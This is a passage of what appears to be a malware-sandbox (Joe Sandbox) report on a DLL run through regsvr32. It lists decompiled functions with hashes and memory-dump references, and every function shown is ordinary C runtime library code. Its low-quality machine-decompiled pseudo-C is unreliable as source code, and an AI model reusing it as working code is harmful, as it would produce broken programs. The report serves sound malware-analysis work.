                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                • API String ID: 2123368286-160817255
                                • Opcode ID: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                • Instruction ID: 5484b95fc3e7d8404cd289b1f0f4537a60eed7c4b35d0a2d8431c0a05804e9c3
                                • Opcode Fuzzy Hash: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                • Instruction Fuzzy Hash: F121AE71B2C6428AE7D89B24EC8476DB3E1F380356F609635E1DD476E4D77ED4408B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D40580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                • API String ID: 2123368286-3409824857
                                • Opcode ID: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                • Instruction ID: f9aafbf46e1760e7e33942ab5f057e126490a1467b3f18266bcf817366ff1fd0
                                • Opcode Fuzzy Hash: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                • Instruction Fuzzy Hash: 5B214C72A1D64286EB909F58E88476E77E0F380394F605525E6CE476E4CBBED444CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2C170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_
                                • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                • API String ID: 1901436342-3621827421
                                • Opcode ID: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                • Instruction ID: 30d3218aedea65180b246fff2bb8bf0e075bfccfde79c9cac609a79bfc2ef9ad
                                • Opcode Fuzzy Hash: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                • Instruction Fuzzy Hash: 4D210132918A8186E790DB24E8817AEB7E0F7C4780F614022E7DD83AB9DB7DD954CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D32C9F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                • API String ID: 2123368286-2972513288
                                • Opcode ID: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                • Instruction ID: a668ed4e1bbba8445569e891f5cf80d88739aba3494b1a7bdc37a92eebe2cfe6
                                • Opcode Fuzzy Hash: 8fb5a3cdd681d6a82b02ff81c277c719a79eaaec91177dc4ca99e8a0364f32ec
                                • Instruction Fuzzy Hash: 9A211A31E1D242CAE7E08F28EC44B6E72E0F344395F605536E6CA866B4D77EE944CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D32695 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                • API String ID: 2123368286-367560414
                                • Opcode ID: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                • Instruction ID: 95dcae893ef448fe982beb095dca5536e461671d142ad8532ffb40fd25d94385
                                • Opcode Fuzzy Hash: 9835c0e10505228e0bf6b58a8474be5f834255bb2e0cd334fa5f5b7dd6645e21
                                • Instruction Fuzzy Hash: 1D114931E0C64A8AF7E08B14EC457BE62E0F750385F608425D2DD46AF5DBBEE4888B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D375E9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                • API String ID: 2123368286-2992382544
                                • Opcode ID: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                • Instruction ID: 1601facfcd706bab2d32f933ec1205f4baa2dc81ccca363939aa7dccefded7e9
                                • Opcode Fuzzy Hash: 9cdd31bc13f045a84d1723aba15172f6d66e597d1102c0836733c4c00faf9839
                                • Instruction Fuzzy Hash: FD112831A08A86D6E7F08B24EC547BE62D1F384395FA0862581DD826E5DF7ED184CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3AFB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                • API String ID: 2123368286-3532421942
                                • Opcode ID: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                • Instruction ID: 5e243132be0629da1aa3e0b85d41bf950597728ff9ff9f12ab22c17114f4bf60
                                • Opcode Fuzzy Hash: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                • Instruction Fuzzy Hash: DB115A71A2D6468AEB949B54E948B6E73E0F340344F605225F6D943AA8C77ED509CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D37E4E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                • API String ID: 2123368286-152112980
                                • Opcode ID: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                • Instruction ID: 316e0cb66aac120259ec5fe7cf49b7d80870e23a4d2a4d539908350f5dd74761
                                • Opcode Fuzzy Hash: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                • Instruction Fuzzy Hash: C1112A31A0CA87C9F7A09B54EC047AE76E0F340345F704425D6CC466F4CBBEE8888B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D234D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                • API String ID: 433497747-929597301
                                • Opcode ID: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                • Instruction ID: 481e6957a9246cfaf4e6bd41be43a49f1ef1e62944320565ea2ccce3e108d99c
                                • Opcode Fuzzy Hash: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                • Instruction Fuzzy Hash: F9012D21A2C64286E3D09B25EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3206A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-3131718208
                                • Opcode ID: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                • Instruction ID: 25215b7a66bf5335accef34de15d40bd2ed0749c1f690011489e68f1b39c7366
                                • Opcode Fuzzy Hash: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                • Instruction Fuzzy Hash: F3113571E086429AF7A09B28E9047BE62D0F344308F608525A7EC076F5DB7EE548CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D31FCB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-1927795013
                                • Opcode ID: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                • Instruction ID: 944cdc0bbf70bc89b755e38a530f77822666c2a95ff09ee036fe4101a55fb2d6
                                • Opcode Fuzzy Hash: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                • Instruction Fuzzy Hash: 62010831E0C646DAF7A09B68EC057AD66D0B380354FB04625A69C066F9DB7EE589CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D25A25 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                • API String ID: 2123368286-563024394
                                • Opcode ID: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                • Instruction ID: a0eba8665c26eae2e6ed32b737e6c8ef722208237a38dcf7c055842964877d15
                                • Opcode Fuzzy Hash: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                • Instruction Fuzzy Hash: 5B01483190860A86FBA09B14EC417AE62E0F351328FB14222D2DC126E4DB7FE545CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D325F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                • API String ID: 2123368286-577066449
                                • Opcode ID: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                • Instruction ID: 4a3f651cd4551bfcababacb72a39fd99133eb44e8e6a79d9543262d1bb372964
                                • Opcode Fuzzy Hash: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                • Instruction Fuzzy Hash: 5D019630E0860ACAE7A09B10EC817AD22E0E794394FA08025A2CD066F8DB3EE6448B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27490 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 1646373207-1276376045
                                • Opcode ID: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                • Instruction ID: 8122274e17013f5b0610865d0345eaa92fe91d894f768ab51d4a4384d1174919
                                • Opcode Fuzzy Hash: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                • Instruction Fuzzy Hash: A5F0AC31918A4282D674DF18F94836DB7B0F384348F644125E6CE42678DF3ED559CA04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D40C80 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
				signed long long _v16;
				long _v24;
				void* _t57;
				signed long long _t59;

				_t57 = __rax;
				_a8 = __ecx;
				E000007FE7FEF9D3F900(_a8);
				if (_t57 == 0xffffffff) goto 0xf9d40d05;
				if (_a8 != 1) goto 0xf9d40cb3;
				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
				if (_a8 != 2) goto 0xf9d40cef;
				_t59 =  *0xf9d4e560;
				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
				E000007FE7FEF9D3F900(1);
				_v16 = _t59;
				E000007FE7FEF9D3F900(2);
				if (_v16 == _t59) goto 0xf9d40d05;
				E000007FE7FEF9D3F900(_a8);
				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
				_v24 = 0;
				goto 0xf9d40d19;
				_v24 = GetLastError();
				E000007FE7FEF9D3F7D0(_a8, _t59);
				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
				if (_v24 == 0) goto 0xf9d40d60;
				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
				goto 0xf9d40d62;
				return 0;
			}







                                0x7fef9d40c80
                                0x7fef9d40c80
                                0x7fef9d40c8c
                                0x7fef9d40c95
                                0x7fef9d40c9c
                                0x7fef9d40cb1
                                0x7fef9d40cb8
                                0x7fef9d40cba
                                0x7fef9d40cca
                                0x7fef9d40cd1
                                0x7fef9d40cd6
                                0x7fef9d40ce0
                                0x7fef9d40ced
                                0x7fef9d40cf3
                                0x7fef9d40d03
                                0x7fef9d40d05
                                0x7fef9d40d0d
                                0x7fef9d40d15
                                0x7fef9d40d1d
                                0x7fef9d40d44
                                0x7fef9d40d4e
                                0x7fef9d40d54
                                0x7fef9d40d5e
                                0x7fef9d40d66

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                • String ID:
                                • API String ID: 1551955814-0
                                • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D21000 Relevance: 6.0, APIs: 4, Instructions: 47threadtimeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: FormatLocaleThread$DateTime
                                • String ID:
                                • API String ID: 3587784874-0
                                • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2A5E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
				signed int _v24;
				char _v42;
				void* _v48;
				signed int _v56;
				char _v312;
				signed char* _v328;
				char _v584;
				char _v840;
				char _v1352;
				char _v1384;
				char _v1392;
				intOrPtr _v1400;
				long long _v1408;
				long long _v1416;
				signed long long _t206;
				signed char* _t214;
				signed long long _t223;
				intOrPtr _t225;
				intOrPtr _t226;
				signed long long _t233;

				_t224 = __rcx;
				_a8 = __rcx;
				_t206 =  *0xf9d4b018; // 0x6ebd4e3f5ce4
				_v24 = _t206 ^ _t233;
				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
				_v56 = 0;
				goto 0xf9d2a63c;
				_v56 = _v56 + 1;
				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
				goto 0xf9d2a62c;
				_v312 = 0x20;
				_v328 =  &_v42;
				goto 0xf9d2a68f;
				_v328 =  &(_v328[2]);
				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
				_v56 =  *_v328 & 0x000000ff;
				goto 0xf9d2a6c2;
				_v56 = _v56 + 1;
				_t214 = _v328;
				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
				goto 0xf9d2a6b2;
				goto 0xf9d2a67b;
				_v1392 = 0;
				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
				_v1408 =  *((intOrPtr*)(_a8 + 4));
				_v1416 =  &_v1352;
				r9d = 0x100;
				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v840;
				_v1416 = 0x100;
				r8d = 0x100;
				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
				_v1384 = 0;
				_v1392 =  *((intOrPtr*)(_a8 + 4));
				_v1400 = 0x100;
				_v1408 =  &_v584;
				_v1416 = 0x100;
				r8d = 0x200;
				_t223 = _a8;
				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
				_v56 = 0;
				_v56 = _v56 + 1;
